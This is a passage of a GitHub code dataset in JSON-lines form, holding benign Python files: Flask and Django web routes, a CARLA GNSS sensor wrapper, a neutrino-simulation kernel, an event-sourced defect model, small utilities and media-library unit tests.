\"\"\"错误页面\"\"\"\n return render_template('error.html', message=message)\n\n\n@app.route('/getCaptcha', methods=[\"GET\"])\ndef test_get_captcha():\n \"\"\"\n 获取图形验证码\n :return:\n \"\"\"\n new_captcha = CaptchaTool()\n # 获取图形验证码\n img, code = new_captcha.get_verify_code()\n response = make_response(img)\n response.headers['Content-Type'] = 'image/gif'\n # 存入session\n session[\"code\"] = code\n return response\n","repo_name":"Yaocool/FlaskDemo","sub_path":"app/user_blueprint.py","file_name":"user_blueprint.py","file_ext":"py","file_size_in_byte":3621,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"86"} +{"seq_id":"27843057056","text":"from django.conf.urls import url\nfrom django.views.generic import TemplateView\n\nfrom ml_django import views\n\nurlpatterns = [\n url(r'^$', TemplateView.as_view(template_name='ml_django/main.html'), name='main'),\n url(r'^login/$', views.login, name='login'),\n url(r'^publications/$', views.Publications.as_view(), name='publications'),\n url(r'^create_publication/$', views.CreatePublication.as_view(), name='create_publication'),\n url(r'^logout/$', views.logout, name='logout')\n]\n","repo_name":"mateoBa/trend","sub_path":"ml_django/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"7934620032","text":"import glob\nimport os\nimport sys\ntry:\n sys.path.append(glob.glob('../carla/dist/carla-*%d.%d-%s.egg' % (\n sys.version_info.major,\n sys.version_info.minor,\n 'win-amd64' if os.name == 'nt' else 'linux-x86_64'))[0])\nexcept IndexError:\n pass\nimport carla\n\nimport numpy as np\nimport math\n\nimport weakref\n\nimport xml.etree.ElementTree as ET\n\nfrom queue import Queue\nfrom collections import OrderedDict\n\nfrom util import destroy_queue\n\nclass Gnss:\n def __init__(self, x, y, z):\n self.x = x\n self.y = y\n self.z = z\n\nclass Mechanism:\n def __init__(self, world, client, vehicle_transform):\n self.world = world\n self.client = client\n\n # Sensor noise profile \n NOISE_STDDEV = 5e-5\n NOISE_BIAS = 1e-5\n NOISE_GNSS_ALT_BIAS = NOISE_BIAS\n NOISE_GNSS_ALT_STDDEV = NOISE_STDDEV\n NOISE_GNSS_LAT_BIAS = NOISE_BIAS\n NOISE_GNSS_LAT_STDDEV = NOISE_STDDEV\n NOISE_GNSS_LON_BIAS = NOISE_BIAS\n NOISE_GNSS_LON_STDDEV = NOISE_STDDEV\n \n # Initialize the vehicle and the sensors\n # vehicle\n self.no_autopilot = True\n self.vehicle_name = 'vehicle.lincoln.mkz_2020'\n blueprint_library = world.get_blueprint_library()\n vehicle_bp = blueprint_library.find(self.vehicle_name)\n self.vehicle = world.spawn_actor(vehicle_bp, vehicle_transform)\n self.vehicle.set_autopilot(self.no_autopilot)\n # GPS\n gnss_bp = blueprint_library.filter(\"sensor.other.gnss\")[0]\n\n # Set sensors' noise\n gnss_bp.set_attribute('noise_alt_bias', str(NOISE_GNSS_ALT_BIAS))\n gnss_bp.set_attribute('noise_alt_stddev', str(NOISE_GNSS_ALT_STDDEV))\n gnss_bp.set_attribute('noise_lat_bias', str(NOISE_GNSS_LAT_BIAS))\n gnss_bp.set_attribute('noise_lat_stddev', str(NOISE_GNSS_LAT_STDDEV))\n gnss_bp.set_attribute('noise_lon_bias', str(NOISE_GNSS_LON_BIAS))\n gnss_bp.set_attribute('noise_lon_stddev', str(NOISE_GNSS_LON_STDDEV))\n\n # Sensor sampling frequency\n GNSS_FREQ = 1\n gnss_bp.set_attribute('sensor_tick', str(1.0 / GNSS_FREQ))\n\n self.gnss = world.spawn_actor(\n blueprint=gnss_bp,\n transform=carla.Transform(carla.Location(x=0, z=0)),\n attach_to=self.vehicle\n )\n\n self.actor_list = [self.vehicle, self.gnss]\n\n 
self.gnss_queue = Queue()\n\n # Hook sensor readings to callback methods\n weak_self = weakref.ref(self)\n self.gnss.listen(lambda data : Mechanism.sensor_callback(weak_self, data, self.gnss_queue))\n\n # Reference latitude and longitude (GNSS)\n self.gnss_lat_ref, self.gnss_long_ref = self._get_latlon_ref()\n\n def destroy(self):\n self.gnss.destroy()\n\n self.client.apply_batch([carla.command.DestroyActor(x) \n for x in self.actor_list if x is not None])\n\n destroy_queue(self.gnss_queue)\n\n\n def get_location(self):\n return self.vehicle.get_location() \n \n @staticmethod\n def sensor_callback(weak_self, data, queue):\n self = weak_self()\n if not self:\n return\n queue.put(data)\n\n def get_sensor_readings(self, frame):\n \"\"\"Return a dict containing the sensor readings\n at the particular frame\n\n :param frame: unique frame at the current world frame\n :type frame: int\n \"\"\"\n sensors = {'gnss': None}\n\n while not self.gnss_queue.empty():\n gnss_data = self.gnss_queue.get()\n #if gnss_data.frame == frame:\n\n alt = gnss_data.altitude\n lat = gnss_data.latitude\n long = gnss_data.longitude\n\n gps_xyz = self.gnss_to_xyz(lat, long, alt)\n sensors['gnss'] = gps_xyz\n \n self.gnss_queue.task_done()\n break\n\n #self.gnss_queue.task_done()\n\n return sensors\n\n def gnss_to_xyz(self, latitude, longitude, altitude):\n \"\"\"Creates Location from GPS (latitude, longitude, altitude).\n This is the inverse of the _location_to_gps method found in\n https://github.com/carla-simulator/scenario_runner/blob/master/srunner/tools/route_manipulation.py\n \n Modified from:\n https://github.com/erdos-project/pylot/blob/master/pylot/utils.py\n \"\"\"\n EARTH_RADIUS_EQUA = 6378137.0\n\n scale = math.cos(self.gnss_lat_ref * math.pi / 180.0)\n basex = scale * math.pi * EARTH_RADIUS_EQUA / 180.0 * self.gnss_long_ref\n basey = scale * EARTH_RADIUS_EQUA * math.log(\n math.tan((90.0 + self.gnss_lat_ref) * math.pi / 360.0))\n\n x = scale * math.pi * EARTH_RADIUS_EQUA / 180.0 * longitude - basex\n y = scale * EARTH_RADIUS_EQUA * math.log(\n math.tan((90.0 + latitude) * math.pi / 360.0)) - basey\n\n # This wasn't in the original method, but seems to be necessary.\n y *= -1\n\n return Gnss(x, y, altitude)\n\n def _get_latlon_ref(self):\n \"\"\"\n Convert from waypoints world coordinates to CARLA GPS coordinates\n :return: tuple with lat and lon coordinates\n https://github.com/carla-simulator/scenario_runner/blob/master/srunner/tools/route_manipulation.py\n \"\"\"\n xodr = self.world.get_map().to_opendrive()\n tree = ET.ElementTree(ET.fromstring(xodr))\n\n # default reference\n lat_ref = 42.0\n lon_ref = 2.0\n\n for opendrive in tree.iter(\"OpenDRIVE\"):\n for header in opendrive.iter(\"header\"):\n for georef in header.iter(\"geoReference\"):\n if georef.text:\n str_list = georef.text.split(' ')\n for item in str_list:\n if '+lat_0' in item:\n lat_ref = float(item.split('=')[1])\n if '+lon_0' in item:\n lon_ref = float(item.split('=')[1])\n return lat_ref, lon_ref","repo_name":"Mahdi-Rahmani/Localization","sub_path":"GPS_IMU/gps_only/mechanism.py","file_name":"mechanism.py","file_ext":"py","file_size_in_byte":5996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"27086809352","text":"\"\"\"\nModule for the simulation kernel.\n\nThe simulation kernel is responsible for running through the simulation\nchain by controlling classes and objects which will independently produce\nneutrinos, create corresponding signals, propagate the signals to 
antennas,\nand handle antenna processing of the signals.\n\n\"\"\"\n\nfrom collections.abc import Sequence\nimport logging\nimport numpy as np\nfrom pyrex.internal_functions import normalize\nfrom pyrex.signals import EmptySignal\nfrom pyrex.askaryan import AskaryanSignal\nfrom pyrex.ray_tracing import RayTracer\nfrom pyrex.ice_model import ice\n\nlogger = logging.getLogger(__name__)\n\n\nclass EventKernel:\n \"\"\"\n High-level kernel for controlling event simulation.\n\n The kernel is responsible for handling the classes and objects which\n control the major simulation steps: particle creation, signal production,\n signal propagation, and antenna response. The modular kernel structure\n allows for easy switching of the classes or objects which handle any of the\n simulation steps.\n\n Parameters\n ----------\n generator\n A particle generator to create neutrino events.\n antennas\n An iterable object consisting of antenna objects which can receive and\n store signals.\n ice_model : optional\n An ice model describing the ice surrounding the `antennas`.\n ray_tracer : optional\n A ray tracer capable of propagating signals from the neutrino vertex\n to the antenna positions.\n signal_model : optional\n A signal class which generates signals based on the particle.\n signal_times : array_like, optional\n The array of times over which the neutrino signal should be generated.\n event_writer : File, optional\n A file object to be used for writing data output.\n triggers : function or dict, optional\n A function or dictionary with function values representing trigger\n conditions of the detector. If a dictionary, must have a \"global\" key\n with its value representing the global detector trigger.\n offcone_max : float or None, optional\n The maximum angle away from the Cherenkov angle to be simulated.\n Antennas which view an event with an angle larger than this angle will\n skip the calculation of the Askaryan signal and assume no significant\n signal is seen. If `None`, no offcone cut is applied.\n weight_min : float or tuple or None, optional\n The minimum particle weight(s) which should be simulated. If a float,\n particles with a total weight less than this value will be skipped. If\n a tuple, particles with a survival weight less than the first element\n of the tuple or with an interaction weight less than the second element\n of the tuple will be skipped. If `None`, no minimum weight is applied.\n attenuation_interpolation : float or None, optional\n The logarithmic (base 10) interpolation step size to be used for\n interpolating attenuation along the ray path. 
If `None`, no\n interpolation of the attenuation is applied.\n\n Attributes\n ----------\n gen\n The particle generator responsible for particle creation.\n antennas\n The iterable of antennas responsible for handling applying their\n response and storing the resulting signals.\n ice\n The ice model describing the ice containing the `antennas`.\n ray_tracer\n The ray tracer responsible for signal propagation through the `ice`.\n signal_model\n The signal class to use to generate signals based on the particle.\n signal_times\n The array of times over which the neutrino signal should be generated.\n writer\n The file object to be used for writing data output.\n triggers\n The trigger condition(s) of the detector.\n offcone_max\n The maximum angle away from the Cherenkov angle to be simulated.\n weight_min\n The minimum particle weight(s) which should be simulated.\n attenuation_interpolation : float or None, optional\n The logarithmic (base 10) interpolation step size to be used for\n interpolating attenuation along the ray path.\n\n See Also\n --------\n pyrex.Event : Class for storing a tree of `Particle` objects\n representing an event.\n pyrex.Particle : Class for storing particle attributes.\n pyrex.ice_model.AntarcticIce : Class describing the ice at the south pole.\n pyrex.RayTracer : Class for calculating the ray-trace solutions between\n points.\n pyrex.AskaryanSignal : Class for generating Askaryan signals according to\n ARZ parameterization.\n pyrex.File : Class for reading or writing data files.\n\n Notes\n -----\n The kernel is designed to be modular so individual parts of the simulation\n chain can be exchanged. In order to interchange the pieces, their classes\n require the following at a minimum:\n\n The particle generator `generator` must have a ``create_event`` method\n which takes no arguments and returns a `Event` object consisting of\n `Particle` objects with ``vertex``, ``direction``, ``energy``, and\n ``weight`` attributes.\n\n The antenna iterable `antennas` must yield each antenna object once when\n iterating directly over `antennas`. Each antenna object must have a\n ``position`` attribute and a ``receive`` method which takes a signal object\n as its first argument, and ``ndarray`` objects as ``direction`` and\n ``polarization`` keyword arguments.\n\n The `ice_model` must have an ``index`` method returning the index of\n refraction given a (negative-valued) depth, and it must support anything\n required of it by the `ray_tracer`.\n\n The `ray_tracer` must be initialized with the particle vertex and an\n antenna position as its first two arguments, and the `ice_model` of the\n kernel as the ``ice_model`` keyword argument. The ray tracer must also have\n ``exists`` and ``solutions`` attributes, the first of which denotes whether\n any paths exist between the given points and the second of which is an\n iterable revealing each path between the points. 
These paths must have\n ``emitted_direction``, ``received_direction``, and ``path_length``\n attributes, as well as a ``propagate`` method which takes a signal object\n and applies the propagation effects of the path in-place to that object.\n\n The `signal_model` must be initialized with the `signal_times` array,\n a `Particle` object from the `Event`, the ``viewing_angle`` and\n ``viewing_distance`` according to the `ray_tracer`, and the `ice_model`.\n The object created should be a `Signal` object with ``times`` and\n ``values`` attributes representing the time-domain Askaryan signal produced\n by the `Particle`.\n\n \"\"\"\n def __init__(self, generator, antennas, ice_model=ice,\n ray_tracer=RayTracer, signal_model=AskaryanSignal,\n signal_times=np.linspace(-50e-9, 50e-9, 2000, endpoint=False),\n event_writer=None, triggers=None, offcone_max=40,\n weight_min=None, attenuation_interpolation=0.1):\n self.gen = generator\n self.antennas = antennas\n self.ice = ice_model\n self.ray_tracer = ray_tracer\n self.signal_model = signal_model\n self.signal_times = signal_times\n self.writer = event_writer\n self.triggers = triggers\n if offcone_max is None:\n self.offcone_max = np.radians(180)\n else:\n self.offcone_max = np.radians(offcone_max)\n if weight_min is None:\n self.weight_min = 0\n else:\n self.weight_min = weight_min\n self.attenuation_interpolation = attenuation_interpolation\n self._gen_count = self.gen.count\n if self.writer is not None:\n if not self.writer.is_open:\n logger.warning(\"Event writer was not open. Opening now.\")\n self.writer.open()\n if not self.writer.has_detector:\n self.writer.set_detector(antennas)\n # Add metadata about the classes used\n kernel_metadata = {\n \"detector_class\": str(type(self.antennas)),\n \"generator_class\": str(type(self.gen)),\n \"ice_model_class\": str(type(self.ice)),\n \"ray_tracer_class\": str(self.ray_tracer),\n \"signal_model_class\": str(self.signal_model),\n \"offcone_max\": np.degrees(self.offcone_max),\n \"attenuation_interpolation\": (self.attenuation_interpolation\n if self.attenuation_interpolation\n is not None else 0),\n }\n if isinstance(self.weight_min, Sequence):\n kernel_metadata[\"survival_weight_min\"] = self.weight_min[0]\n kernel_metadata[\"interaction_weight_min\"] = self.weight_min[1]\n else:\n kernel_metadata[\"weight_min\"] = self.weight_min\n try:\n kernel_metadata[\"earth_model_class\"] = str(type(\n self.gen.earth_model\n ))\n except AttributeError:\n pass\n self.writer.create_analysis_metadataset(\"sim_parameters\")\n self.writer.add_analysis_metadata(\"sim_parameters\", kernel_metadata)\n\n def event(self):\n \"\"\"\n Create a neutrino event and run it through the simulation chain.\n\n Creates a particle using the ``generator``, produces a signal from that\n event, propagates that signal through the ice according to the\n ``ice_model`` and the ``ray_tracer``, and passes it into the\n ``antennas`` for processing.\n\n Returns\n -------\n event : Event\n The neutrino event generated which is responsible for the waveforms\n on the antennas.\n triggered : bool, optional\n If the ``triggers`` parameter was specified, contains whether the\n global trigger condition of the detector was met.\n\n See Also\n --------\n pyrex.Event : Class for storing a tree of `Particle` objects\n representing an event.\n pyrex.Particle : Class for storing particle attributes.\n\n \"\"\"\n event = self.gen.create_event()\n ray_paths = []\n polarizations = []\n for i in range(len(self.antennas)):\n ray_paths.append([])\n 
polarizations.append([])\r\n        for particle in event:\r\n            logger.info(\"Processing event for %s\", particle)\r\n            if isinstance(self.weight_min, Sequence):\r\n                if ((particle.survival_weight is not None and\r\n                     particle.survival_weight<self.weight_min[0]) or\r\n                        (particle.interaction_weight is not None and\r\n                         particle.interaction_weight<self.weight_min[1])):\r\n                    logger.debug(\"Skipping %s with weight below minimum\", particle)\r\n                    continue\r\n            else:\r\n                if particle.weight<self.weight_min:\r\n                    logger.debug(\"Skipping %s with weight below minimum\", particle)\r\n                    continue\r\n            for i, ant in enumerate(self.antennas):\r\n                rt = self.ray_tracer(particle.vertex, ant.position,\r\n                                     ice_model=self.ice)\r\n                # If no path(s) between the points, skip ahead\r\n                if not rt.exists:\r\n                    logger.debug(\"Ray paths to %s do not exist\", ant)\r\n                    continue\r\n                ray_paths[i].extend(rt.solutions)\r\n                for path in rt.solutions:\r\n                    # nu_pol is the signal polarization at the neutrino vertex,\r\n                    # transverse to the emitted ray direction in the plane of\r\n                    # the particle direction and the emitted ray direction\r\n                    nu_pol = normalize(np.vdot(path.emitted_direction,\r\n                                               particle.direction)\r\n                                       * path.emitted_direction\r\n                                       - particle.direction)\r\n                    polarizations[i].append(nu_pol)\r\n                    # psi is the viewing angle measured from the shower axis\r\n                    psi = np.arccos(np.vdot(particle.direction,\r\n                                            path.emitted_direction))\r\n                    try:\r\n                        if psi>self.offcone_max:\r\n                            raise ValueError(\"Viewing angle is larger than \"+\r\n                                             \"offcone limit \"+\r\n                                             str(np.degrees(self.offcone_max)))\r\n                        pulse = self.signal_model(\r\n                            times=self.signal_times,\r\n                            particle=particle,\r\n                            viewing_angle=psi,\r\n                            viewing_distance=path.path_length,\r\n                            ice_model=self.ice\r\n                        )\r\n                    except ValueError as err:\r\n                        logger.debug(\"Eliminating invalid Askaryan signal: %s\",\r\n                                     err)\r\n                        ant.receive(\r\n                            EmptySignal(self.signal_times+path.tof,\r\n                                        value_type=EmptySignal.Type.field)\r\n                        )\r\n                    else:\r\n                        ant_pulses, ant_pols = path.propagate(\r\n                            signal=pulse, polarization=nu_pol,\r\n                            attenuation_interpolation=self.attenuation_interpolation\r\n                        )\r\n                        ant.receive(\r\n                            ant_pulses,\r\n                            direction=path.received_direction,\r\n                            polarization=ant_pols\r\n                        )\r\n\r\n        if self.triggers is None:\r\n            triggered = None\r\n        elif isinstance(self.triggers, dict):\r\n            triggered = {key: trigger_func(self.antennas)\r\n                         for key, trigger_func in self.triggers.items()}\r\n        else:\r\n            triggered = self.triggers(self.antennas)\r\n\r\n        if self.writer is not None:\r\n            self.writer.add(event=event, triggered=triggered,\r\n                            ray_paths=ray_paths, polarizations=polarizations,\r\n                            events_thrown=self.gen.count-self._gen_count)\r\n\r\n        self._gen_count = self.gen.count\r\n\r\n        if triggered is None:\r\n            return event\r\n        elif isinstance(self.triggers, dict):\r\n            return event, triggered['global']\r\n        else:\r\n            return event, triggered\r\n","repo_name":"bhokansonfasig/pyrex","sub_path":"pyrex/kernel.py","file_name":"kernel.py","file_ext":"py","file_size_in_byte":15422,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"86"} +{"seq_id":"17354066609","text":"import json\r\n\r\nfrom ..constants import (DEFECT_AMENDED, DEFECT_CLOSED, DEFECT_DELETED,\r\n                         DEFECT_OPENED, DEFECT_REOPENED, DEFECT_IMPORTED,\r\n                         DEFECT_LOCKED)\r\nfrom django.utils import timezone\r\n\r\ndef assert_datetime(datetime):\r\n    if not isinstance(datetime, timezone.datetime):\r\n        raise AssertionError(\"input value must be a datetime instance.\")\r\n\r\nclass ChangeHistory(object):\r\n    def __init__(self):\r\n        self.date_created = None\r\n        self.description = None\r\n        self.submitter = None\r\n    \r\nclass DefectViewModel(object):\r\n    def __init__(self, defect_events):\r\n        if len(defect_events) == 0:\r\n            raise Exception(\"No events were found for this defect\")\r\n        self.last_sequence_nr = -1\r\n        self.change_history = []\r\n        self.locked = False\r\n        self._replay_from(defect_events)\r\n    \r\n    def apply(self, event):\r\n        assert_datetime(event['timestamp'])\r\n        self.date_changed = event['timestamp']\r\n        if event['event_type'] == DEFECT_IMPORTED:\r\n            return self._on_imported(event)\r\n        if event['event_type'] == DEFECT_OPENED:\r\n            return self._on_opened(event)\r\n        if event['event_type'] == DEFECT_AMENDED:\r\n            return self._on_amended(event)\r\n        if event['event_type'] == DEFECT_REOPENED:\r\n            return self._on_reopened(event)\r\n        if event['event_type'] == DEFECT_CLOSED:\r\n            return self._on_closed(event)\r\n        if event['event_type'] == DEFECT_DELETED:\r\n            return self._on_deleted(event)\r\n        if event['event_type'] == DEFECT_LOCKED:\r\n            return self._on_locked(event)\r\n    \r\n    def amend(self, user, timestamp, **kwargs):\r\n        self.assert_not_locked()\r\n        self.assert_valid(timestamp)\r\n        if self.status != \"Open\":\r\n            raise Exception(\"Defect must be in open state to amend.\")\r\n        event = self._create_event(DEFECT_AMENDED, kwargs, user, timestamp)\r\n        self.apply(event)\r\n        return event\r\n    \r\n    def close(self, user, 
release_id, reason, timestamp):\n self.assert_not_locked()\n self.assert_valid(timestamp)\n if self.status == \"Closed\":\n raise Exception(\"Defect is already closed.\")\n data = {\n 'release_id': release_id,\n 'reason': reason\n }\n event = self._create_event(DEFECT_CLOSED, data, user, timestamp)\n self.apply(event)\n return event;\n \n def reopen(self, user, release_id, reason, timestamp):\n self.assert_not_locked()\n self.assert_valid(timestamp)\n if self.status != \"Closed\":\n raise Exception(\"Defect must be in closed state to reopen.\")\n data = {\n 'release_id': release_id,\n 'reason': reason\n }\n event = self._create_event(DEFECT_REOPENED, data, user, timestamp)\n self.apply(event)\n return event\n \n def soft_delete(self, user, timestamp):\n self.assert_not_locked()\n self.assert_valid(timestamp)\n if self.status != \"Closed\":\n raise Exception(\"Defect must be in closed state to delete.\")\n event = self._create_event(DEFECT_DELETED, {}, user, timestamp)\n self.apply(event)\n return event\n \n def make_obsolete(self, user, reason, timestamp):\n self.assert_not_locked()\n assert(reason != '')\n self.assert_valid(timestamp)\n if self.status != \"Closed\":\n raise Exception(\"Defect must first be closed to make obsolete.\")\n event = self._create_event(DEFECT_LOCKED, { 'reason': reason }, user, timestamp)\n self.apply(event)\n return event\n \n def _create_event(self, event_type, dictionary, user, created):\n return {\n 'timestamp': created,\n 'sequence_nr': self.last_sequence_nr + 1,\n 'aggregate_id': self.id,\n 'aggregate_type': 'DEFECT',\n 'event_type': event_type,\n 'payload': dictionary,\n 'owner': {\n 'username': user.username,\n 'email': user.email\n }\n }\n \n @property\n def is_active(self):\n return self.status == \"Open\"\n \n @property\n def is_locked(self):\n return self.locked\n \n def assert_not_locked(self):\n if self.locked:\n raise Exception(\"Defect is obsolete and can no longer be modified.\")\n \n def assert_valid(self, datetime):\n assert_datetime(datetime)\n last_date = self.change_history[0].date_created\n if last_date > datetime:\n raise Exception(\"datetime specified is earlier than latest change\")\n \n def _add_changeset_defect_closed(self, event):\n payload = event['payload'] \n description = \"Defect closed.\"\n description += \"\\nVersion: %s\" % payload['release_id']\n if payload['reason'] != \"\":\n description += \"\\nReason: \\\"%s\\\"\" % payload['reason']\n ch = self._add_changeset(event, description)\n \n def _add_changeset_defect_reopened(self, event):\n payload = event['payload']\n description = \"Defect has been reopened.\"\n description += \"\\nVersion: %s\" % payload['release_id']\n if payload['reason'] != \"\":\n description += \"\\nReason: \\\"%s\\\"\" % payload['reason']\n ch = self._add_changeset(event, description)\n \n def _add_changeset_defect_locked(self, event):\n payload = event['payload']\n description = \"Defect has been made obsolete.\"\n description += \"\\nReason: \\\"%s\\\"\" % payload['reason']\n ch = self._add_changeset(event, description)\n\n def _add_changeset_defect_amended(self, event):\n ch = self._add_changeset(event, \"Defect has been updated.\")\n \n def _create_changeset_defect_opened(self, event):\n ch = self._add_changeset(event, \"New defect created.\")\n \n def _create_changeset_defect_imported(self, event):\n ch = self._add_changeset(event, \"New defect imported.\")\n \n def _add_changeset(self, event, description):\n ch = ChangeHistory()\n ch.date_created = event['timestamp']\n ch.submitter = 
event['owner']\n ch.description = description\n self.change_history.insert(0, ch)\n \n def _replay_from(self, defect_events):\n for event in defect_events:\n self.last_sequence_nr += 1\n sequence_nr = event['sequence_nr']\n if (sequence_nr != self.last_sequence_nr):\n error = \"id {}: sequence_nr {}, expected {}\".format(\n event['aggregate_id'],\n sequence_nr,\n self.last_sequence_nr\n )\n raise AssertionError(error)\n self.apply(event)\n \n def _on_imported(self, event):\n self._create_changeset_defect_imported(event)\n self.id = event['aggregate_id']\n self.submitter = event['owner']\n self.date_created = event['timestamp']\n self.status = 'Open'\n self._set_properties(event)\n\n def _on_opened(self, event):\n self._create_changeset_defect_opened(event)\n self.id = event['aggregate_id']\n self.submitter = event['owner']\n self.date_created = event['timestamp']\n self.status = 'Open'\n self._set_properties(event)\n \n def _on_closed(self, event):\n self._add_changeset_defect_closed(event)\n self.status = 'Closed'\n self.release_id = event['payload']['release_id']\n \n def _on_reopened(self, event):\n self._add_changeset_defect_reopened(event) \n self.status = 'Open'\n self.release_id = event['payload']['release_id']\n \n def _on_amended(self, event):\n self._add_changeset_defect_amended(event) \n self._set_properties(event)\n \n def _on_deleted(self, event):\n self.status = 'Deleted'\n \n def _on_locked(self, event):\n self._add_changeset_defect_locked(event)\n self.locked = True\n self.status = 'Obsolete'\n \n def _set_properties(self, event):\n payload = event['payload']\n self.project_code = payload['project_code']\n self.release_id = payload['release_id']\n self.priority = payload['priority']\n self.reference = payload['reference']\n self.description = payload['description']\n self.comments = payload['comments']\n","repo_name":"nevtum/hivemind","sub_path":"src/defects/domain/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"29827351816","text":"from flask import Flask, request\nimport os.path\nimport requests\n\napp = Flask(__name__)\n\n\n@app.route('/calculate', methods=['POST'])\ndef calculate():\n input_data = request.json\n if \"file\" in input_data and \"product\" in input_data and input_data[\"file\"] is not None and input_data[\"product\"] is not None:\n file = input_data[\"file\"]\n if os.path.isfile(\"host_vol/\"+file):\n response = requests.post(\"http://flask2:6003/calculate\", json=input_data)\n return response.json()\n return {\"file\": file, \"error\": \"File not found.\"}, 404\n\n return {\"file\": None, \"error\": \"Invalid JSON input.\"}, 404\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=6000, debug=True)","repo_name":"shubham101096/cloud","sub_path":"A1/flask1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"32628403032","text":"import csv\n\ndef get_pageinfo(path):\n page_list=[]\n page_dict={}\n data=csv.reader(open(path,'r'))\n for info in data:\n page_list.append(info)\n page_dict=dict(page_list)\n return page_dict\nif __name__=='__main__':\n re=get_pageinfo(r'.\\PageMsg.csv')\n for i in re:\n 
print(i,re[i])\r\n\r\n\r\n","repo_name":"hblovey/sandy-git-test","sub_path":"XIAOMI/Pageinfo.py","file_name":"Pageinfo.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"41409318919","text":"import os\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\ndef storage(args):\n\tsize = 0\n\tfile = os.listdir('%s/warehouse/%s/'%(BASE_DIR,args))\n\tfor i in file:\n\t\tfile_size = os.path.getsize('%s/warehouse/%s/%s'%(BASE_DIR,args,i))\n\t\tsize+=file_size\n\treturn size\n\n\n\n","repo_name":"WuAlin0327/python3-notes","sub_path":"网络编程/FTP程序/服务端/bin/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"29922131160","text":"import json, re\nfrom modules.http_request import HttpRequests\n\nclass NGModel:\n    @staticmethod\n    def fetch_nagtas_storage_data():\n        url = 'https://ir.eia.gov/ngs/wngsr.json'\n        response = HttpRequests.get(url)\n        try:\n            # strip any tag-like markup around the payload before parsing\n            data = json.loads(re.sub('<[^>]*>', '', response.text))\n        except json.decoder.JSONDecodeError:\n            # The response is not a valid JSON object\n            print(\"Error: the server did not return a valid JSON object\")\n            return None\n        return data","repo_name":"peter-oroszvari/eia_bot","sub_path":"eia/ng_storage_report_model.py","file_name":"ng_storage_report_model.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"27675045098","text":"import sys\nfrom PyQt5.QtWidgets import QMessageBox, QApplication\n\nclass SlotStat(QMessageBox):\n    def __init__(self):\n        super(SlotStat, self).__init__()\n\n        self.setWindowTitle(\"Valid Value\")\n        self.setText(\" VALID VALUE status \\n\\n\"\n                     \"• complete \\n\\n\"\n                     \"• ongoing \\n\\n\"\n                     \"• to be done\")\n\n        self.setIcon(QMessageBox.Information)\nx = SlotStat()\ndef slot_stat():\n    global x\n    return x.show()\n","repo_name":"a-graziano/PreEx-Builder","sub_path":"msgBox/SlotStat.py","file_name":"SlotStat.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"18005323560","text":"import unittest\nimport datetime\nimport os\n\nfrom ..tools import sandbox\nfrom ...models import library\n\nclass LibraryTests(unittest.TestCase):\n    def setUp(self):\n        # Create a sandbox in a temporary (safe) directory\n        self.sandbox = sandbox.Sandbox()\n        self.sandbox.create()\n\n        # Add unique files to each 'Videos' library\n        self.unique_source_files = self.sandbox.populate_library_with_unique_media(self.sandbox.source_videos_library)\n        self.unique_backup_files = self.sandbox.populate_library_with_unique_media(self.sandbox.backup_videos_library)\n        \n        # Add matching files to both 'Videos' library\n        self.matching_source_files, self.matching_backup_files = self.sandbox.populate_libraries_with_identical_media(\n            self.sandbox.source_videos_library,\n            self.sandbox.backup_videos_library\n        )\n\n    def tearDown(self):\n        self.sandbox.destroy()\n\n    def test_init_source_videos_library(self):\n        LibraryTestMethods().init_library(self.sandbox.source_videos_library)\n\n    def test_init_source_music_library(self):\n        LibraryTestMethods().init_library(self.sandbox.source_music_library)\n\n    def test_init_backup_videos_library(self):\n        LibraryTestMethods().init_library(self.sandbox.backup_videos_library)\n\n    def test_init_backup_music_library(self):\n        
LibraryTestMethods().init_library(self.sandbox.backup_music_library)\n\n def test_load_all_from_source_videos_library(self):\n media_in_library = self.unique_source_files + self.matching_source_files\n LibraryTestMethods().load_all_media(self.sandbox.source_videos_library, media_in_library)\n\n def test_load_all_from_backup_videos_library(self):\n media_in_library = self.unique_backup_files + self.matching_backup_files\n LibraryTestMethods().load_all_media(self.sandbox.backup_videos_library, media_in_library)\n\n def test_copy_new_media_to_source_video_library(self):\n LibraryTestMethods().copy_new_media(\n self.sandbox.source_videos_library,\n self.sandbox.backup_videos_library\n )\n\n def test_copy_new_media_to_backup_video_library(self):\n LibraryTestMethods().copy_new_media(\n self.sandbox.backup_videos_library,\n self.sandbox.source_videos_library\n )\n\n def test_copy_existing_media_to_source_video_library(self):\n LibraryTestMethods().copy_existing_media(\n self.sandbox.source_videos_library,\n self.sandbox.backup_videos_library\n )\n\n def test_copy_existing_media_to_backup_video_library(self):\n LibraryTestMethods().copy_existing_media(\n self.sandbox.backup_videos_library,\n self.sandbox.source_videos_library\n )\n\n def test_delete_media_from_source_video_library(self):\n LibraryTestMethods().delete_media(self.sandbox.source_videos_library)\n \n def test_delete_media_from_backup_video_library(self):\n LibraryTestMethods().delete_media(self.sandbox.backup_videos_library)\n\n def test_ignore_txt_in_source_video_library(self):\n file_path = self.sandbox.make_media(\n 'ignore_me.txt',\n 'foo',\n self.sandbox.source_videos_library\n )\n LibraryTestMethods().ignored_file_extensions(\n 